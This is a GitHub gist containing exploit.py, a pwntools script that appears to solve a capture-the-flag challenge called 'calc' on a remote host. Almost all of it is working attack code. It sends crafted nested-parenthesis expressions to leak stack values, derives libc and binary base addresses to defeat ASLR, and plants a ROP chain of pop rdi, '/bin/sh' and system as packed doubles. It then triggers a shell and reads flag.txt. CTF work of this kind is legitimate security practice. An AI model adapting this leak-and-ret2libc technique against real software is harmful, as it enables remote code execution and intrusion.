Skip to content

Instantly share code, notes, and snippets.

@Lorak-mmk

Lorak-mmk/exploit.py Secret

Last active Dec 28, 2020
Embed
What would you like to do?
#!/usr/bin/env python
from pwn import *
import struct
#r = remote('127.0.0.1', 1337)
r = remote('h4x.0x04.net', 2137)
#r = process(['./calc'], env={'LD_LIBRARY_PATH': '.'})
context.terminal = ['termite', '-e']
def int_to_double(val):
return struct.unpack('d', struct.pack('Q', val))[0]
def readstack(n, read=True):
reps = 31 + n
cvar = chr(ord('a') + n)
payload = f'{cvar}={"(" * reps}+{")" * (n+7)}'
if n > 0:
beg = n
payload += f'+0*{"(" * beg}0+{")+".join([chr(ord("a") + i) for i in range(n)][::-1])}{")" * (beg - n + 1)}'
payload += ')' * (reps - (n+7))
if len(payload) > 1023:
print('PAYLOAD TOO BIG')
print('payload:', payload)
r.sendline(payload)
if(read):
r.sendline(cvar)
val_str = r.recvline().strip().decode()
val = float(val_str)
packed = struct.pack('d', val)
assert(len(packed) == 8)
return struct.unpack('Q', packed)[0], val_str
#gdb.attach(r, gdbscript=open('gdbscript.py'))
stack = []
for i in range(0, 8):
val, val_str = readstack(i)
print(f'stack[{i}] = {hex(val)} (str={val_str})')
stack.append(val)
libc_start_main = stack[7] - 242
libc_addr = libc_start_main - 0x28060
libc_system = libc_addr + 0x4a830
libc_bin_sh = libc_addr + 0x18de78
main_addr = stack[3] - 125
exec_addr = main_addr - 0x1b5e
pop_rdi = exec_addr + 0x1c73
payload = f'd={int_to_double(pop_rdi)}'
print(payload)
r.sendline(payload)
payload = f'e={int_to_double(libc_bin_sh)}'
print(payload)
r.sendline(payload)
payload = f'f={int_to_double(libc_system)}'
print(payload)
r.sendline(payload)
readstack(6, read=False)
r.sendline('cat flag.txt')
print(r.readline().decode().strip())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment